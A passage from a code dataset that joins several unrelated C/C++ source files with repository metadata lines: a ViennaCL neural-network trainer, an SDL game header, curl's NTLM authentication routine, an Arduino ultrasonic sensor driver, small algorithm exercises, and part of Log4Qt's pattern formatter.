mgd_data[i][viennacl::row_major::mem_index(
j,k,vc_mgd_y[i][0].internal_size1(),vc_mgd_y[i][0].internal_size2())] = val;
}
fgets(str, 1000, file);
}
}
fclose(file);
printf("reading_time, %.10f\n", mgd_timer.GetTime());
for(int i = 0; i < hyper_para->num_batches; i++){
viennacl::fast_copy(&mgd_data[i][0], &mgd_data[i][0] + mgd_data[i].size(), vc_mgd_y[i][0]);
viennacl::fast_copy(&mgd_label[i][0], &mgd_label[i][0] + mgd_label[i].size(), vc_mgd_label[i]);
}
delete[] mgd_data;
delete[] mgd_label;
}
void MGD_VCL_MLP::init_model(int c_init){
vector<vector<double> >* h_weight = new vector<vector<double> >[neural_nets->num_grad];
double t_dist = 0.;
switch(c_init){
case 0: // normal_distribution
t_dist = int(sqrt(neural_nets->num_units[0] + neural_nets->num_units[1]))+1;
//cout<<"t_dist: "<<t_dist<<endl;
for(int i = 0; i < neural_nets->num_grad; i++){
default_random_engine generator(hyper_para->seed);
normal_distribution<double> distributions(
0, sqrt(2.*t_dist/(neural_nets->num_units[i]+neural_nets->num_units[i+1])));
//cout<<"layer: "<<i<<", normal_dist: 0;"<<
// sqrt(2.*t_dist/(neural_nets->num_units[i]+neural_nets->num_units[i+1]))<<endl;
for(int j = 0; j < neural_nets->num_units[i]; j++){
vector<double> t_weight(neural_nets->num_units[i+1]);
for(int k = 0; k < neural_nets->num_units[i+1]; k++){
t_weight[k] = distributions(generator);
}
h_weight[i].push_back(t_weight);
}
}
break;
case 1: // uniform_distribution for sigmoid
for(int i = 0; i < neural_nets->num_grad; i++){
t_dist = sqrt(6./(neural_nets->num_units[i]+neural_nets->num_units[i+1]));
default_random_engine generator(hyper_para->seed);
uniform_real_distribution<double> distributions(-t_dist,t_dist);
//cout<<"layer: "<<i<<", uniform_dist for sigmoid: "<<
// -t_dist<<";"<<t_dist<<endl;
for(int j = 0; j < neural_nets->num_units[i]; j++){
vector<double> t_weight(neural_nets->num_units[i+1]);
for(int k = 0; k < neural_nets->num_units[i+1]; k++){
t_weight[k] = distributions(generator);
}
h_weight[i].push_back(t_weight);
}
}
break;
case 2: // uniform_distribution for tanh
for(int i = 0; i < neural_nets->num_grad; i++){
t_dist = 4 * sqrt(6./(neural_nets->num_units[i]+neural_nets->num_units[i+1]));
default_random_engine generator(hyper_para->seed);
uniform_real_distribution<double> distributions(-t_dist,t_dist);
//cout<<"layer: "<<i<<", uniform_dist for tanh: "<<
// -t_dist<<";"<<t_dist<<endl;
for(int j = 0; j < neural_nets->num_units[i]; j++){
vector<double> t_weight(neural_nets->num_units[i+1]);
for(int k = 0; k < neural_nets->num_units[i+1]; k++){
t_weight[k] = distributions(generator);
}
h_weight[i].push_back(t_weight);
}
}
}
for(int i = 0; i < neural_nets->num_grad; i++){
vc_mgd_weight[i] = viennacl::matrix<double, viennacl::row_major>(
neural_nets->num_units[i], neural_nets->num_units[i+1]);
viennacl::copy(h_weight[i], vc_mgd_weight[i]);
}
for(int i = 0; i < hyper_para->num_batches; i++){
vc_mgd_gradient[i].resize(neural_nets->num_grad);
for(int j = 0; j < neural_nets->num_grad; j++){
vc_mgd_gradient[i][j] = viennacl::matrix<double, viennacl::row_major>(
neural_nets->num_units[j], neural_nets->num_units[j+1]);
}
}
delete[] h_weight;
}
void MGD_VCL_MLP::compute_gradient(int batch_idx, int processed_tuples){
compute_gradient_bgd_vcl(vc_mgd_label[batch_idx], vc_mgd_y[batch_idx], vc_mgd_weight, neural_nets,
processed_tuples, vc_mgd_gradient[batch_idx], dloss_dy[batch_idx], dloss_dx[batch_idx]);
}
void MGD_VCL_MLP::update_model(){
update_model_bgd_vcl(vc_mgd_weight, vc_mgd_gradient[j], neural_nets->num_grad, stepsize);
}
void MGD_VCL_MLP::forward(int batch_idx, int processed_tuples){
forward_mgd_vcl(vc_mgd_y[batch_idx], vc_mgd_weight, neural_nets->num_units, processed_tuples);
}
double MGD_VCL_MLP::get_loss(){
double loss = get_loss_mgd_vcl(vc_mgd_label, vc_mgd_y, vc_mgd_weight, neural_nets->num_units, hyper_para);
return loss / input_data->num_tuples;
}
double MGD_VCL_MLP::get_loss_para(){
double loss = get_loss_mgd_vcl_para(vc_mgd_label, vc_mgd_y, vc_mgd_weight, neural_nets->num_units, hyper_para);
return loss / input_data->num_tuples;
}
void MGD_VCL_MLP::train(){
loss = get_loss();
printf("initial loss,%.10f\n",loss);
//loss = get_loss_para();
//printf("initial loss(para),%.10f\n",loss);
for(int i = 0; i < hyper_para->iterations; i++){
stepsize = hyper_para->N_0 * exp(-hyper_para->decay * i);
mgd_timer.Restart();
//#pragma omp parallel for schedule(dynamic)
for(int j = 0; j < hyper_para->num_batches; j++){
int processed_tuples = hyper_para->batch_size;
if(j == hyper_para->num_batches-1 && hyper_para->last_batch_processed)
processed_tuples = hyper_para->tuples_last_batch;
forward(j, processed_tuples);
compute_gradient(j, processed_tuples);
update_model();
}
backprop_time += mgd_timer.GetTime();
mgd_timer.Restart();
loss = get_loss();
//loss = get_loss_para();
forward_time += mgd_timer.GetTime();
printf("iter,%d,stepsize,%.10f,backprop_time,%.10f,forward_time,%.10f,loss,%.10f\n",
i+1, stepsize, backprop_time, forward_time, loss);
}
}
#endif /* MODEL_MGD_VCL_MLP_H_ */
|
d0cc1427b0b38ab68bb8ae64728b1706d1e8dabb | 7c7b1b90b80e8d032a420b13bb2d389b6203ab61 | /src/MainCharacter.h | d5e9c5cbf3fc79c549ca25e741648a8a3a502012 | [] | no_license | sargiros/RPG_Game | adf2b9556d3719e377b149e18efe283a8a6cfcfc | 60985ab17e887f2bfe33fd2bc33c112550c92117 | refs/heads/master | 2021-01-21T00:16:16.437795 | 2016-01-24T15:33:12 | 2016-01-24T15:33:12 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 859 | h | MainCharacter.h | #ifndef GUARD_MAINCHARACTER_H
#define GUARD_MAINCHARACTER_H
#include "CSprite.h"
#include <cmath>
#include "_sdl.h"
#include "CEnvironment.h"
class MainCharacter {
public:
MainCharacter(SDL *passed_sdl_setup, int *passed_MouseX, int *passed_MouseY, float *passed_CameraX, float *passed_CameraY, Environment *passed_environment);
~MainCharacter();
void Update();
void Draw();
double GetDistance(const int x1, const int y1, const int x2, const int y2);
private:
Environment *environment;
void UpdateAnimation();
void UpdateControllers();
int *MouseX;
int *MouseY;
float *CameraX;
float *CameraY;
SDL* csdl_setup;
CSprite *main_char;
size_t timeCheck;
bool follow;
int follow_point_x;
int follow_point_y;
double distance;
bool stopAnimation;
const double PI;
};
#endif
|
1383d8ecacb20c940f15dee341844ce36a35473b | 0eff74b05b60098333ad66cf801bdd93becc9ea4 | /second/download/curl/gumtree/curl_repos_function_323_curl-7.15.0.cpp | b7e0d650dbadb76615f5755a50510ca7584229fe | [] | no_license | niuxu18/logTracker-old | 97543445ea7e414ed40bdc681239365d33418975 | f2b060f13a0295387fe02187543db124916eb446 | refs/heads/master | 2021-09-13T21:39:37.686481 | 2017-12-11T03:36:34 | 2017-12-11T03:36:34 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 13,723 | cpp | curl_repos_function_323_curl-7.15.0.cpp | CURLcode Curl_output_ntlm(struct connectdata *conn,
bool proxy)
{
const char *domain=""; /* empty */
const char *host=""; /* empty */
#ifndef USE_WINDOWS_SSPI
int domlen=(int)strlen(domain);
int hostlen = (int)strlen(host);
int hostoff; /* host name offset */
int domoff; /* domain name offset */
#endif
size_t size;
char *base64=NULL;
unsigned char ntlmbuf[256]; /* enough, unless the host/domain is very long */
/* point to the address of the pointer that holds the string to sent to the
server, which is for a plain host or for a HTTP proxy */
char **allocuserpwd;
/* point to the name and password for this */
char *userp;
char *passwdp;
/* point to the correct struct with this */
struct ntlmdata *ntlm;
struct auth *authp;
curlassert(conn);
curlassert(conn->data);
if(proxy) {
allocuserpwd = &conn->allocptr.proxyuserpwd;
userp = conn->proxyuser;
passwdp = conn->proxypasswd;
ntlm = &conn->proxyntlm;
authp = &conn->data->state.authproxy;
}
else {
allocuserpwd = &conn->allocptr.userpwd;
userp = conn->user;
passwdp = conn->passwd;
ntlm = &conn->ntlm;
authp = &conn->data->state.authhost;
}
authp->done = FALSE;
/* not set means empty */
if(!userp)
userp=(char *)"";
if(!passwdp)
passwdp=(char *)"";
switch(ntlm->state) {
case NTLMSTATE_TYPE1:
default: /* for the weird cases we (re)start here */
#ifdef USE_WINDOWS_SSPI
{
SecBuffer buf;
SecBufferDesc desc;
SECURITY_STATUS status;
ULONG attrs;
const char *user;
int domlen;
TimeStamp tsDummy; /* For Windows 9x compatibility of SPPI calls */
ntlm_sspi_cleanup(ntlm);
user = strchr(userp, '\\');
if (!user)
user = strchr(userp, '/');
if (user) {
domain = userp;
domlen = user - userp;
user++;
}
else {
user = userp;
domain = "";
domlen = 0;
}
if (user && *user) {
/* note: initialize all of this before doing the mallocs so that
* it can be cleaned up later without leaking memory.
*/
ntlm->p_identity = &ntlm->identity;
memset(ntlm->p_identity, 0, sizeof(*ntlm->p_identity));
if ((ntlm->identity.User = (unsigned char *)strdup(user)) == NULL)
return CURLE_OUT_OF_MEMORY;
ntlm->identity.UserLength = strlen(user);
if ((ntlm->identity.Password = (unsigned char *)strdup(passwdp)) == NULL)
return CURLE_OUT_OF_MEMORY;
ntlm->identity.PasswordLength = strlen(passwdp);
if ((ntlm->identity.Domain = malloc(domlen+1)) == NULL)
return CURLE_OUT_OF_MEMORY;
strncpy((char *)ntlm->identity.Domain, domain, domlen);
ntlm->identity.Domain[domlen] = '\0';
ntlm->identity.DomainLength = domlen;
ntlm->identity.Flags = SEC_WINNT_AUTH_IDENTITY_ANSI;
}
else {
ntlm->p_identity = NULL;
}
if (AcquireCredentialsHandle(
NULL, (char *)"NTLM", SECPKG_CRED_OUTBOUND, NULL, ntlm->p_identity,
NULL, NULL, &ntlm->handle, &tsDummy
) != SEC_E_OK) {
return CURLE_OUT_OF_MEMORY;
}
desc.ulVersion = SECBUFFER_VERSION;
desc.cBuffers = 1;
desc.pBuffers = &buf;
buf.cbBuffer = sizeof(ntlmbuf);
buf.BufferType = SECBUFFER_TOKEN;
buf.pvBuffer = ntlmbuf;
status = InitializeSecurityContext(&ntlm->handle, NULL, (char *) host,
ISC_REQ_CONFIDENTIALITY |
ISC_REQ_REPLAY_DETECT |
ISC_REQ_CONNECTION,
0, SECURITY_NETWORK_DREP, NULL, 0,
&ntlm->c_handle, &desc, &attrs, &tsDummy
);
if (status == SEC_I_COMPLETE_AND_CONTINUE ||
status == SEC_I_CONTINUE_NEEDED) {
/* CompleteAuthToken() is not present in Win9x, so load it dynamically */
SECURITY_STATUS (__stdcall * pCompleteAuthToken)
(PCtxtHandle,PSecBufferDesc);
HMODULE hSecur32 = GetModuleHandle("secur32.dll");
if (hSecur32 != NULL) {
pCompleteAuthToken =
(SECURITY_STATUS (__stdcall *)(PCtxtHandle,PSecBufferDesc))
GetProcAddress(hSecur32, "CompleteAuthToken");
if( pCompleteAuthToken != NULL ) {
pCompleteAuthToken(&ntlm->c_handle, &desc);
}
}
}
else if (status != SEC_E_OK) {
FreeCredentialsHandle(&ntlm->handle);
return CURLE_RECV_ERROR;
}
ntlm->has_handles = 1;
size = buf.cbBuffer;
}
#else
hostoff = 32;
domoff = hostoff + hostlen;
/* Create and send a type-1 message:
Index Description Content
0 NTLMSSP Signature Null-terminated ASCII "NTLMSSP"
(0x4e544c4d53535000)
8 NTLM Message Type long (0x01000000)
12 Flags long
16 Supplied Domain security buffer(*)
24 Supplied Workstation security buffer(*)
32 start of data block
*/
snprintf((char *)ntlmbuf, sizeof(ntlmbuf), "NTLMSSP%c"
"\x01%c%c%c" /* 32-bit type = 1 */
"%c%c%c%c" /* 32-bit NTLM flag field */
"%c%c" /* domain length */
"%c%c" /* domain allocated space */
"%c%c" /* domain name offset */
"%c%c" /* 2 zeroes */
"%c%c" /* host length */
"%c%c" /* host allocated space */
"%c%c" /* host name offset */
"%c%c" /* 2 zeroes */
"%s" /* host name */
"%s", /* domain string */
0, /* trailing zero */
0,0,0, /* part of type-1 long */
LONGQUARTET(
NTLMFLAG_NEGOTIATE_OEM| /* 2 */
NTLMFLAG_NEGOTIATE_NTLM_KEY /* 200 */
/* equals 0x0202 */
),
SHORTPAIR(domlen),
SHORTPAIR(domlen),
SHORTPAIR(domoff),
0,0,
SHORTPAIR(hostlen),
SHORTPAIR(hostlen),
SHORTPAIR(hostoff),
0,0,
host, domain);
/* initial packet length */
size = 32 + hostlen + domlen;
#endif
/* now keeper of the base64 encoded package size */
size = Curl_base64_encode((char *)ntlmbuf, size, &base64);
if(size >0 ) {
Curl_safefree(*allocuserpwd);
*allocuserpwd = aprintf("%sAuthorization: NTLM %s\r\n",
proxy?"Proxy-":"",
base64);
free(base64);
}
else
return CURLE_OUT_OF_MEMORY; /* FIX TODO */
break;
case NTLMSTATE_TYPE2:
/* We received the type-2 already, create a type-3 message:
Index Description Content
0 NTLMSSP Signature Null-terminated ASCII "NTLMSSP"
(0x4e544c4d53535000)
8 NTLM Message Type long (0x03000000)
12 LM/LMv2 Response security buffer(*)
20 NTLM/NTLMv2 Response security buffer(*)
28 Domain Name security buffer(*)
36 User Name security buffer(*)
44 Workstation Name security buffer(*)
(52) Session Key (optional) security buffer(*)
(60) Flags (optional) long
52 (64) start of data block
*/
{
#ifdef USE_WINDOWS_SSPI
SecBuffer type_2, type_3;
SecBufferDesc type_2_desc, type_3_desc;
SECURITY_STATUS status;
ULONG attrs;
TimeStamp tsDummy; /* For Windows 9x compatibility of SPPI calls */
type_2_desc.ulVersion = type_3_desc.ulVersion = SECBUFFER_VERSION;
type_2_desc.cBuffers = type_3_desc.cBuffers = 1;
type_2_desc.pBuffers = &type_2;
type_3_desc.pBuffers = &type_3;
type_2.BufferType = SECBUFFER_TOKEN;
type_2.pvBuffer = ntlm->type_2;
type_2.cbBuffer = ntlm->n_type_2;
type_3.BufferType = SECBUFFER_TOKEN;
type_3.pvBuffer = ntlmbuf;
type_3.cbBuffer = sizeof(ntlmbuf);
status = InitializeSecurityContext(&ntlm->handle, &ntlm->c_handle,
(char *) host,
ISC_REQ_CONFIDENTIALITY |
ISC_REQ_REPLAY_DETECT |
ISC_REQ_CONNECTION,
0, SECURITY_NETWORK_DREP, &type_2_desc,
0, &ntlm->c_handle, &type_3_desc,
&attrs, &tsDummy);
if (status != SEC_E_OK)
return CURLE_RECV_ERROR;
size = type_3.cbBuffer;
ntlm_sspi_cleanup(ntlm);
#else
int lmrespoff;
int ntrespoff;
int useroff;
unsigned char lmresp[0x18]; /* fixed-size */
#ifdef USE_NTRESPONSES
unsigned char ntresp[0x18]; /* fixed-size */
#endif
const char *user;
int userlen;
user = strchr(userp, '\\');
if(!user)
user = strchr(userp, '/');
if (user) {
domain = userp;
domlen = (int)(user - domain);
user++;
}
else
user = userp;
userlen = (int)strlen(user);
mkhash(passwdp, &ntlm->nonce[0], lmresp
#ifdef USE_NTRESPONSES
, ntresp
#endif
);
domoff = 64; /* always */
useroff = domoff + domlen;
hostoff = useroff + userlen;
lmrespoff = hostoff + hostlen;
ntrespoff = lmrespoff + 0x18;
/* Create the big type-3 message binary blob */
size = snprintf((char *)ntlmbuf, sizeof(ntlmbuf),
"NTLMSSP%c"
"\x03%c%c%c" /* type-3, 32 bits */
"%c%c%c%c" /* LanManager length + allocated space */
"%c%c" /* LanManager offset */
"%c%c" /* 2 zeroes */
"%c%c" /* NT-response length */
"%c%c" /* NT-response allocated space */
"%c%c" /* NT-response offset */
"%c%c" /* 2 zeroes */
"%c%c" /* domain length */
"%c%c" /* domain allocated space */
"%c%c" /* domain name offset */
"%c%c" /* 2 zeroes */
"%c%c" /* user length */
"%c%c" /* user allocated space */
"%c%c" /* user offset */
"%c%c" /* 2 zeroes */
"%c%c" /* host length */
"%c%c" /* host allocated space */
"%c%c" /* host offset */
"%c%c%c%c%c%c" /* 6 zeroes */
"\xff\xff" /* message length */
"%c%c" /* 2 zeroes */
"\x01\x82" /* flags */
"%c%c" /* 2 zeroes */
/* domain string */
/* user string */
/* host string */
/* LanManager response */
/* NT response */
,
0, /* zero termination */
0,0,0, /* type-3 long, the 24 upper bits */
SHORTPAIR(0x18), /* LanManager response length, twice */
SHORTPAIR(0x18),
SHORTPAIR(lmrespoff),
0x0, 0x0,
#ifdef USE_NTRESPONSES
SHORTPAIR(0x18), /* NT-response length, twice */
SHORTPAIR(0x18),
#else
0x0, 0x0,
0x0, 0x0,
#endif
SHORTPAIR(ntrespoff),
0x0, 0x0,
SHORTPAIR(domlen),
SHORTPAIR(domlen),
SHORTPAIR(domoff),
0x0, 0x0,
SHORTPAIR(userlen),
SHORTPAIR(userlen),
SHORTPAIR(useroff),
0x0, 0x0,
SHORTPAIR(hostlen),
SHORTPAIR(hostlen),
SHORTPAIR(hostoff),
0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0,
0x0, 0x0);
/* size is now 64 */
size=64;
ntlmbuf[62]=ntlmbuf[63]=0;
/* Make sure that the user and domain strings fit in the target buffer
before we copy them there. */
if(size + userlen + domlen >= sizeof(ntlmbuf)) {
failf(conn->data, "user + domain name too big");
return CURLE_OUT_OF_MEMORY;
}
memcpy(&ntlmbuf[size], domain, domlen);
size += domlen;
memcpy(&ntlmbuf[size], user, userlen);
size += userlen;
/* we append the binary hashes to the end of the blob */
if(size < ((int)sizeof(ntlmbuf) - 0x18)) {
memcpy(&ntlmbuf[size], lmresp, 0x18);
size += 0x18;
}
#ifdef USE_NTRESPONSES
if(size < ((int)sizeof(ntlmbuf) - 0x18)) {
memcpy(&ntlmbuf[size], ntresp, 0x18);
size += 0x18;
}
#endif
ntlmbuf[56] = (unsigned char)(size & 0xff);
ntlmbuf[57] = (unsigned char)(size >> 8);
#endif
/* convert the binary blob into base64 */
size = Curl_base64_encode((char *)ntlmbuf, size, &base64);
if(size >0 ) {
Curl_safefree(*allocuserpwd);
*allocuserpwd = aprintf("%sAuthorization: NTLM %s\r\n",
proxy?"Proxy-":"",
base64);
free(base64);
}
else
return CURLE_OUT_OF_MEMORY; /* FIX TODO */
ntlm->state = NTLMSTATE_TYPE3; /* we sent a type-3 */
authp->done = TRUE;
}
break;
case NTLMSTATE_TYPE3:
/* connection is already authenticated,
* don't send a header in future requests */
if(*allocuserpwd) {
free(*allocuserpwd);
*allocuserpwd=NULL;
}
authp->done = TRUE;
break;
}
return CURLE_OK;
} |
cb4b74a1f599875f45b8bff406adb5f27d46e3eb | 3c02f40debde84f14d3b8183573047c528e0d40c | /src/ultrasonic_sensor.cpp | f7e456aedb58af01fe9ec3c06ccc55086747ee22 | [] | no_license | petioptrv/obstacle-avoider | 465a8a6ee9e1efa1b9b44cd9f65be5c7aa7f1126 | 9e4d2808d3fe3067974c4f1487d470fe438eb6e0 | refs/heads/main | 2023-02-05T12:16:51.848835 | 2020-12-28T17:37:25 | 2020-12-28T17:37:25 | 324,596,462 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 556 | cpp | ultrasonic_sensor.cpp | //
// Created by Petio Petrov on 2020-12-27.
//
#include <Arduino.h>
#include "ultrasonic_sensor.h"
#define echo_pin 14
#define trig_pin 15
#define trig_pulse_us 10
#define cm_factor 58 // high level time * velocity (340M/S) / 2
void UltrasonicSensor::us_init() {
pinMode(echo_pin, INPUT);
pinMode(trig_pin, OUTPUT);
}
double UltrasonicSensor::get_dist() {
digitalWrite(trig_pin, HIGH);
delayMicroseconds(trig_pulse_us);
digitalWrite(trig_pin, LOW);
unsigned long duration = pulseIn(echo_pin, HIGH);
return double(duration)/cm_factor;
}
|
f3c11c65a34c41bac2b0193d1acc11fe13c69050 | d4162fb94b7cde0482b115630a6d6cff00a79736 | /GUI/Subject.cpp | 6531ae0dba0fd4d1c264a149cfbdbfa9507506c3 | [] | no_license | shikevin/straights | e1e0b9ebbc87af659d926b30cb21e53b239db032 | ba01b92508183fb1c17ae08515c5d0ac5cc865dd | refs/heads/master | 2021-01-18T13:14:45.160653 | 2015-07-20T03:56:26 | 2015-07-20T03:56:26 | 37,504,470 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 263 | cpp | Subject.cpp | #include "Subject.h"
using namespace std;
void Subject::subscribe(ViewComponent* newComponent) {
myViewComponents.push_back(newComponent);
}
void Subject::notify() {
for(int i = 0; i < myViewComponents.size(); i++) {
myViewComponents[i]->updateView();
}
}
|
86911ec2cb0d90b351af75db5e842cf777b1d754 | ecb2df271a0665be643b873c6d7ab98e7432c591 | /codemonk/hash_b.cpp | 8a20bd452e0c0eec5cc49f01dc70abed2cef0ede | [] | no_license | viagostini/maratona | d250b3464b10e0be4f4b057ec2845c2ad2d44ecf | 72060dd77df622055c9e171283e29fde5f7b42ac | refs/heads/master | 2021-06-04T02:53:56.607364 | 2021-04-04T21:55:08 | 2021-04-04T21:55:08 | 39,924,690 | 0 | 2 | null | null | null | null | UTF-8 | C++ | false | false | 497 | cpp | hash_b.cpp | #include <bits/stdc++.h>
using namespace std;
typedef long long num;
const int MAX = 1e6 + 2;
int seen[MAX];
int main(){
int t, n, a, b;
scanf("%d", &t);
while(t--){
memset(seen,0,sizeof(seen));
scanf("%d", &n);
int ans = 0;
for(int i = 0; i < n; i++){
scanf("%d%d", &a, &b);
if(a == b) continue;
seen[a]++;
if(seen[b]) seen[b]--;
else ans++;
}
printf("%d\n", ans);
}
} |
2ec692df268a891b18c89d3d531371c9cbd17edf | 16fbae82d89b1833ff2b6eab2ef8488323410f03 | /potw/idefix/src/main.cpp | d7648bd71513afaae09cd05be59470ea17886b06 | [] | no_license | skaan/algo-lab | f99aae36f2df4664a3a1256be1910ddc78058590 | 56f5dee566a739a0930ecf5d2bddb591e7cbdd02 | refs/heads/master | 2023-02-26T17:05:32.562314 | 2021-01-27T12:40:59 | 2021-01-27T12:40:59 | 299,893,217 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 715 | cpp | main.cpp | #include <iostream>
#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>
#include <CGAL/Delaunay_triangulation_2.h>
typedef CGAL::Exact_predicates_inexact_constructions_kernel K;
typedef CGAL::Delaunay_triangulation_2<K> Triangulation;
typedef K::Point_2 P;
void testcase() {
size_t n, m, k;
long s;
std::cin >> n >> m >> s >> k;
std::vector<P> trees(n);
for(size_t i = 0; i < n; i++) {
std::cin >> trees(i);
}
Triangulation tri;
tri.insert(trees.begin(), trees.end());
std::vector<P> bones(m);
for(int i = 0; i < m; i++) {
std::cin >> bones(i);
}
std::cout << 0 << " " << 1 << "\n";
}
int main() {
int t;
for(std::cin >> t; t > 0; t--) {
testcase();
}
} |
83bb7f5c6c51f1ee5a510b6ce4d315e163ef90d9 | baed28cefe521a2559f02d4e9ccdadda4648074f | /힙정렬(재귀).cpp | a09a725740d72ceb8d88a79bd6725310e3c5dd23 | [] | no_license | YoungSeokHong/Young_algorithm_study | e313070a751cde28d928467b6f65177a835dd14c | e81d3d1d6445f1e0842dce2648542aa1234643de | refs/heads/master | 2023-06-23T19:17:50.640435 | 2021-07-24T13:23:08 | 2021-07-24T13:23:08 | 347,615,381 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 728 | cpp | 힙정렬(재귀).cpp | #include <iostream>
using namespace std;
int number = 9;
int heap[9] = {6, 7, 5, 8, 3, 5, 9, 1, 6};
void swap(int array[], int a, int b)
{
int temp = array[a];
array[a] = array[b];
array[b] = temp;
}
void heapMaker(int array[], int root, int range)
{
if(root >= range)
{
return;
}
int c = root * 2 + 1;
if(heap[c] < heap[c + 1] && c < range-1)
{
c++;
}
if(heap[c] > heap[root] && c < range)
{
swap(heap, c, root);
}
heapMaker(array, c, range);
}
int main()
{
for(int i=number-1; i>=0; i--)
{
heapMaker(heap, i, number);
}
for(int i=number-1; i>=0; i--)
{
swap(heap, i, 0);
heapMaker(heap, 0, i);
}
for(int i=0; i<number; i++)
{
cout << heap[i] << ' ';
}
return 0;
}
|
addb45a417c6698cf9fcb002b02d1a670413e514 | 4e603d2be54c035f69e72bb49f88fcee33323130 | /map/pipelinemap.h | aad113daff5815765bcca241fe3083fddf9a4244 | [] | no_license | sofysmol/Pipline | d010b2662427a4430f52e0a294d3d72f5654bf1d | a6b1359d6021e4c4f79772d6a9d4fbdf84bc554e | refs/heads/master | 2020-03-14T22:00:39.891453 | 2018-05-30T19:36:49 | 2018-05-30T19:36:49 | 131,811,011 | 0 | 1 | null | 2018-05-30T20:50:36 | 2018-05-02T06:58:17 | C++ | UTF-8 | C++ | false | false | 311 | h | pipelinemap.h | #ifndef PIPELINEMAP_H
#define PIPELINEMAP_H
#include <QString>
#include <QList>
#include "pipelinecity.h"
class PipelineMap
{
public:
PipelineMap(int id, QString name, QList<PipelineCity> cities);
PipelineMap();
int id;
QString name;
QList<PipelineCity> cities;
};
#endif // PIPELINEMAP_H
|
f6c851209ee39e30d201a265901f852d3f8ca37f | 5123c314454de042d571b02bc99137a4604e4c5c | /src/log4qt/helpers/patternformatter.cpp | 0e91482b4e833848bc78193ae0c4b24a0ff3aaa2 | [
"Apache-2.0"
] | permissive | MEONMedical/Log4Qt | ccf6caee2a8d08a03ad4d5d4a5cb57f1f83e0b55 | e2a65d5d0c626a33f9384f2a9227efee3035dbf9 | refs/heads/master | 2023-07-03T19:48:54.680007 | 2023-04-04T07:12:45 | 2023-04-04T07:12:45 | 48,431,997 | 563 | 235 | Apache-2.0 | 2022-09-29T04:40:27 | 2015-12-22T12:58:42 | C++ | UTF-8 | C++ | false | false | 20,556 | cpp | patternformatter.cpp | /******************************************************************************
*
* This file is part of Log4Qt library.
*
* Copyright (C) 2007 - 2020 Log4Qt contributors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
******************************************************************************/
#include "helpers/patternformatter.h"
#include "helpers/datetime.h"
#include "helpers/logerror.h"
#include "layout.h"
#include "logger.h"
#include "loggingevent.h"
#include "logmanager.h"
#include <QString>
#include <limits>
namespace Log4Qt
{
/*!
* \brief The class FormattingInfo stores the formatting modifier for a
* pattern converter.
*
* \sa PatternConverter
*/
class FormattingInfo
{
public:
FormattingInfo()
{
clear();
}
void clear();
static QString intToString(int i);
public:
int mMinLength;
int mMaxLength;
bool mLeftAligned;
};
/*!
* \brief The class PatternConverter is the abstract base class for all
* pattern converters.
*
* PatternConverter handles the minimum and maximum modifier for a
* conversion character. The actual conversion is by calling the
* convert() member function of the derived class.
*
* \sa PatternLayout::format()
*/
class PatternConverter
{
public:
PatternConverter(Log4Qt::FormattingInfo formattingInfo = FormattingInfo()) :
mFormattingInfo(formattingInfo)
{}
virtual ~PatternConverter() = default;
private:
Q_DISABLE_COPY(PatternConverter)
public:
void format(QString &format, const LoggingEvent &loggingEvent) const;
protected:
virtual QString convert(const LoggingEvent &loggingEvent) const = 0;
protected:
FormattingInfo mFormattingInfo;
};
/*!
* \brief The class BasicPatternConverter converts several members of a
* LoggingEvent to a string.
*
* BasicPatternConverter is used by PatternLayout to convert members that
* do not reuquire additional formatting to a string as part of formatting
* the LoggingEvent. It handles the following conversion characters:
* 'm', 'p', 't', 'x'
*
* \sa PatternLayout::format()
* \sa PatternConverter::format()
*/
class BasicPatternConverter : public PatternConverter
{
public:
enum Type
{
MESSAGE_CONVERTER,
NDC_CONVERTER,
LEVEL_CONVERTER,
THREAD_CONVERTER,
FILENAME_CONVERTER,
FUNCTIONNAME_CONVERTER,
LINENUMBER_CONVERTER,
LOCATION_CONVERTER,
CATEGORYNAME_CONVERTER
};
public:
BasicPatternConverter(Log4Qt::FormattingInfo formattingInfo,
Type type) :
PatternConverter(formattingInfo),
mType(type)
{}
private:
Q_DISABLE_COPY(BasicPatternConverter)
protected:
QString convert(const LoggingEvent &loggingEvent) const override;
private:
Type mType;
};
/*!
* \brief The class DatePatternConverter converts the time stamp of a
* LoggingEvent to a string.
*
* DatePatternConverter is used by PatternLayout to convert the time stamp
* of a LoggingEvent to a string as part of formatting the LoggingEvent.
* It handles the 'd' and 'r' conversion character.
*
* \sa PatternLayout::format()
* \sa PatternConverter::format()
*/
class DatePatternConverter : public PatternConverter
{
public:
DatePatternConverter(Log4Qt::FormattingInfo formattingInfo,
const QString &format) :
PatternConverter(formattingInfo),
mFormat(format)
{}
private:
Q_DISABLE_COPY(DatePatternConverter)
protected:
QString convert(const LoggingEvent &loggingEvent) const override;
private:
QString mFormat;
};
/*!
* \brief The class LiteralPatternConverter provides string literals.
*
* LiteralPatternConverter is used by PatternLayout to embed string
* literals as part of formatting the LoggingEvent. It handles string
* literals and the 'n' conversion character.
*
* \sa PatternLayout::format()
* \sa PatternConverter::format()
*/
class LiteralPatternConverter : public PatternConverter
{
public:
LiteralPatternConverter(const QString &literal) :
mLiteral(literal)
{}
private:
Q_DISABLE_COPY(LiteralPatternConverter)
protected:
QString convert(const LoggingEvent &loggingEvent) const override;
private:
QString mLiteral;
};
/*!
* \brief The class LoggepatternConverter converts the Logger name of a
* LoggingEvent to a string.
*
* LoggepatternConverter is used by PatternLayout to convert the Logger
* name of a LoggingEvent to a string as part of formatting the
* LoggingEvent. It handles the 'c' conversion character.
*
* \sa PatternLayout::format()
* \sa PatternConverter::format()
*/
class LoggepatternConverter : public PatternConverter
{
public:
LoggepatternConverter(Log4Qt::FormattingInfo formattingInfo,
int precision) :
PatternConverter(formattingInfo),
mPrecision(precision)
{}
private:
Q_DISABLE_COPY(LoggepatternConverter)
protected:
